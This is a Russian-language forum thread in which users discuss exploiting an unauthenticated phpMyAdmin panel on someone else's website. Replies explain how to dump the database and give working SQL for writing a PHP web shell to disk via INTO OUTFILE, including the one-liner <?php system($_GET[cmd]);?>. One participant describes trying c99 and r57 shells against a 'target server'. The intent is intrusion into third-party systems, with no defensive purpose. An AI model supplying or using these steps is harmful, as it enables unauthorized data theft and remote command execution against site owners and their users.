не знал куда писать но напигу сюда.
кароче есть форум на сайте ну это фигня там другая фигня.. например:я пишу http://xxx.xxx.ru/admin/ он мне сразу зашол
[Добро пожаловать в phpMyAdmin 2.4.0

MySQL 4.1.11 на localhost как xxx@localhost] не попросил не каких паролей не чо как нибудь можно скачать БД ? :confused:

Да, можно ;)

ну это воще странно что тебя теда впустили без пасов.. повезло)
естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
слева выбирааешь нужные базы и днлаешь дамп (экспорт).

ну это воще странно что тебя теда впустили без пасов.. повезло)
естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
слева выбирааешь нужные базы и днлаешь дамп (экспорт).
Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как? :eek:

Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как?
Если ничего не путаю, то надо сделать дамп базы, изменить несколько (или даже одну) строк и залить обратно.
Если правильно понял твой вопрос.

блин я в этом phpAdmine не Шарю как там куда захадить то надо ?? там кароче с лева написано
БД отсутствуют и есть MySQL Создать новую БД и всякой разной Хрени как залить шел ?? поясните Ньюбу :p

2qPhoenix, Buga выполняем эти команды:
UPDATE table SET column='<? system("$cmd"); ?>' WHERE id='0';
SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';
UPDATE table SET column='nothing' WHERE id='0';
Шелл будет в /path/to/file/shell.php

апять я запутался я же навичок.
где и как их выполнить ? :confused:

где выполнять? ну даешь... там в майадмине есть такая ссылка вверху "SQL"
жмешь ее потом откроется форма в ней пишешь sql запрос и внизу жмешь кнопку "пошел" или "submit" или чо там у теебя..

WinXP, MySQL 4.1.18-nt, таблица 'lol' c текстовым столбцом 'txt', работаю MySQL Query Browser 1.1.20, админки нет (на целевом)
Пасяб virgoz за идею, правда всего так и не понял =)

Приступим:
Загоняем шелл в таблу: LOAD DATA INFILE 'e:/shell/nst.php' INTO TABLE lol; гуд! 2103 строк записано...
Вынимаем на локалхост: SELECT * FROM lol INTO OUTFILE 'd:/http/shell.php'; гуд! 2103 строк записано...
Запускаю - белый экран, исходный код - пусто...
Сравниваю шеллы:
Исходник - 82*940 байт/2103 строк
Созданый - 82*547 байт/2156 строк
пробую прогнать сие еще 3-4 раза и впадаю в отчаяние...

Плз, втолкуйте в чем ошибка, и желательно поскорее, бо на целевом серваке я тож пару раз проверил... :rolleyes:

Попробуй с другим Shell'ом. Может прокатит.

Забыл отписаться: пробовал с99 pre-release 12 и 15 - тот же компот... ставил МиСКЛю 5.0.18 - нифига =(
недавно прогнал r57 1.23 и 1.24, и c99 beta 5.02.2005 - ваще выдает кучу строк типа: "Row *** was truncated; it contained more data than there were input columns"

Да нету там такой Хрени Где каманды вводить ехх... явно не судьба :mad:

--> там кароче с лева написано. БД отсутствуют. Наверное поэтому ничего не получается.
Да, и лить туда 2000 строчек не надо, достаточно этого <?php system($_GET[cmd]);?>.

а Где Это Написать ? если не трудно Скажите где ЭТО выполнять Sql Запросы сылку если можно а то я там не могу найти

В разделе "Уязвимости форумов" не учат пользоваться коммандами скула. PhpMyAdmin сюда отношения не имеет.
Тема закрыта.